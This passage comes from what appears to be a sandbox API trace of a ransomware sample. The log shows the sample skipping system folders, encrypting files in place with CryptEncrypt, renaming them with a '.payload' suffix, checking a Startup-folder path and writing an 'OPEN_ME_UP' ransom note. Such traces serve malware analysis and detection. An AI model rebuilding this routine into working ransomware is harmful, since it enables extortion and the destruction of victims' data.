lpOverlapped=0x0) returned 1 [0063.368] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.368] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.369] GetProcessHeap () returned 0x5e0000 [0063.369] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0063.369] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.369] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0063.369] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0063.369] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0063.369] CloseHandle (hObject=0x430) returned 1 [0063.417] GetProcessHeap () returned 0x5e0000 [0063.418] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0063.418] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp_r00t_{nhhHyu}.payload") returned 61 [0063.418] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp_r00t_{nhhhyu}.payload")) returned 1 [0063.419] GetProcessHeap () returned 0x5e0000 [0063.419] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0063.419] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x2120bc00, ftLastWriteTime.dwHighDateTime=0x1cac6c9, nFileSizeHigh=0x0, nFileSizeLow=0x4f5113, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Windows6.0-KB956250-v6001-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0063.419] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="Windows") returned 1 [0063.419] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="$Recycle.bin") returned 1 [0063.419] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="System Volume Information") returned 1 [0063.419] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="Program Files") returned 1 [0063.419] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="Program Files (x86)") returned 1 [0063.419] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 59 [0063.419] StrStrIW (lpFirst="Windows6.0-KB956250-v6001-x64.msu", lpSrch=".payload") returned 0x0 [0063.419] lstrcmpW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0063.419] lstrcmpW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="taridd") returned 1 [0063.419] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0063.419] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0063.420] GetTickCount () returned 0x1150442 [0063.420] GetTickCount () returned 0x1150442 [0063.420] GetTickCount () returned 0x1150442 [0063.420] GetTickCount () returned 0x1150442 [0063.420] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0063.420] GetProcessHeap () returned 0x5e0000 [0063.420] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0063.420] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.422] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.422] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.422] GetProcessHeap () returned 0x5e0000 [0063.422] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0063.422] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.422] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0063.424] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0063.424] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0063.424] CloseHandle (hObject=0x430) returned 1 [0063.620] GetProcessHeap () returned 0x5e0000 [0063.621] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0063.621] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu_r00t_{nhhHyu}.payload") returned 81 [0063.621] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu_r00t_{nhhhyu}.payload")) returned 1 [0063.621] GetProcessHeap () returned 0x5e0000 [0063.621] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0063.621] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x1bbe7400, ftLastWriteTime.dwHighDateTime=0x1cac6bf, nFileSizeHigh=0x0, nFileSizeLow=0x217520, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Windows6.0-KB956250-v6001-x86.msu", cAlternateFileName="WINDOW~2.MSU")) returned 1 [0063.622] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="Windows") returned 1 [0063.622] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="$Recycle.bin") returned 1 [0063.622] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="System Volume Information") returned 1 [0063.622] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="Program Files") returned 1 [0063.622] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="Program Files (x86)") returned 1 [0063.622] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 59 [0063.622] StrStrIW (lpFirst="Windows6.0-KB956250-v6001-x86.msu", lpSrch=".payload") returned 0x0 [0063.622] lstrcmpW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0063.622] lstrcmpW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="taridd") returned 1 [0063.622] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0063.622] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0063.622] GetTickCount () returned 0x115050d [0063.622] GetTickCount () returned 0x115050d [0063.622] GetTickCount () returned 0x115050d [0063.622] GetTickCount () returned 0x115050d [0063.622] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0063.622] GetProcessHeap () returned 0x5e0000 [0063.622] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0063.622] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.624] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.625] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.625] GetProcessHeap () returned 0x5e0000 [0063.625] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0063.625] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.625] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0063.627] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0063.627] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0063.627] CloseHandle (hObject=0x430) returned 1 [0063.720] GetProcessHeap () returned 0x5e0000 [0063.720] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0063.721] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu_r00t_{nhhHyu}.payload") returned 81 [0063.721] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu_r00t_{nhhhyu}.payload")) returned 1 [0063.721] GetProcessHeap () returned 0x5e0000 [0063.721] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0063.721] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x5b8e5700, ftLastWriteTime.dwHighDateTime=0x1cac6d1, nFileSizeHigh=0x0, nFileSizeLow=0x4db1ce, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Windows6.1-KB958488-v6001-x64.msu", cAlternateFileName="WINDOW~3.MSU")) returned 1 [0063.721] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="Windows") returned 1 [0063.721] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="$Recycle.bin") returned 1 [0063.721] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="System Volume Information") returned 1 [0063.721] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="Program Files") returned 1 [0063.721] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="Program Files (x86)") returned 1 [0063.721] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 59 [0063.722] StrStrIW (lpFirst="Windows6.1-KB958488-v6001-x64.msu", lpSrch=".payload") returned 0x0 [0063.722] lstrcmpW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0063.722] lstrcmpW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="taridd") returned 1 [0063.722] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0063.722] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0063.722] GetTickCount () returned 0x115056b [0063.722] GetTickCount () returned 0x115056b [0063.722] GetTickCount () returned 0x115056b [0063.722] GetTickCount () returned 0x115056b [0063.722] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0063.722] GetProcessHeap () returned 0x5e0000 [0063.722] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0063.722] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.724] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.724] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.724] GetProcessHeap () returned 0x5e0000 [0063.725] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0063.725] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.725] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0063.726] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0063.726] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0063.726] CloseHandle (hObject=0x430) returned 1 [0064.022] GetProcessHeap () returned 0x5e0000 [0064.022] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0064.022] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu_r00t_{nhhHyu}.payload") returned 81 [0064.022] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu_r00t_{nhhhyu}.payload")) returned 1 [0064.023] GetProcessHeap () returned 0x5e0000 [0064.023] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0064.023] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 1 [0064.023] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="Windows") returned 1 [0064.023] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="$Recycle.bin") returned 1 [0064.023] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="System Volume Information") returned 1 [0064.024] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="Program Files") returned 1 [0064.024] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="Program Files (x86)") returned 1 [0064.024] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 59 [0064.024] StrStrIW (lpFirst="Windows6.1-KB958488-v6001-x86.msu", lpSrch=".payload") returned 0x0 [0064.024] lstrcmpW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.024] lstrcmpW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="taridd") returned 1 [0064.024] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0064.024] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0064.024] GetTickCount () returned 0x1150694 [0064.024] GetTickCount () returned 0x1150694 [0064.024] GetTickCount () returned 0x1150694 [0064.024] GetTickCount () returned 0x1150694 [0064.024] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0064.025] GetProcessHeap () returned 0x5e0000 [0064.025] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0064.025] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.027] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.027] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.027] GetProcessHeap () returned 0x5e0000 [0064.027] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0064.119] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.119] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.122] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.122] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.122] CloseHandle (hObject=0x430) returned 1 [0064.293] GetProcessHeap () returned 0x5e0000 [0064.293] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0064.293] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu_r00t_{nhhHyu}.payload") returned 81 [0064.294] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu_r00t_{nhhhyu}.payload")) returned 1 [0064.294] GetProcessHeap () returned 0x5e0000 [0064.294] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0064.294] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 0 [0064.294] FindClose (in: hFindFile=0x606be0 | out: hFindFile=0x606be0) returned 1 [0064.294] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 57 [0064.294] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0064.295] WriteFile (in: hFile=0x424, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342fa74, 